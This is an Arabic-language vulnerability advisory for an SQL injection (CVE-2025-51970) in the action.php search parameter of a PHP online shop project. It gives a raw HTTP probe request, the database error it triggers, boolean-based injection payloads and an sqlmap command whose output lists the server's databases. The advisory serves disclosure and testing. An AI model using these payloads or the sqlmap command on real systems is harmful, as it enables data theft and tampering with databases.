
حقن SQL في نظام التسوق عبر الإنترنت المتقدم (CVE-2025-51970)
CVE-2025-51970 - حقن SQL في نظام التسوق عبر الإنترنت المتقدم
تم اكتشاف ثغرة أمنية خطيرة من نوع حقن SQL في مشروع Online Shopping System Advanced بواسطة PuneethReddyHC. توجد الثغرة في action.php، الذي يفشل في تنقية إدخال المستخدم من معامل POST keyword بشكل صحيح. يمكن للمهاجم حقن SQL ضار لاستخراج البيانات أو العبث بقاعدة البيانات.
action.phpkeyword (عبر POST)<Highlight language="http">
POST /online-shopping-system-advanced-master/action.php HTTP/1.1
Host: 192.168.1.109
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: */*
Referer: http://192.168.1.109/online-shopping-system-advanced-master/
Content-Length: 75
Connection: close
keyword=test'&search=1
</Highlight>
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2025 10:07:50 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\online-shopping-system-advanced-master\action.php:193
e%' AND 2*3*8=6*8 AND '0004XX7'!='0004XX7%
e%' AND 3*2>5 AND '0004XX7'!='0004XX7%
e%' AND 3*2*0>=0 AND '0004XX7'!='0004XX7%
يمكن تأكيد الثغرة واستغلالها تلقائيًا باستخدام sqlmap.
sqlmap -u "http://192.168.1.109/action.php" --data="keyword=test&search=1" --dbs
[13:07:39] [INFO] fetching database names
available databases [6]:
[*] information_schema
[*] mysql
[*] onlineshop
[*] performance_schema
[*] phpmyadmin
[*] test
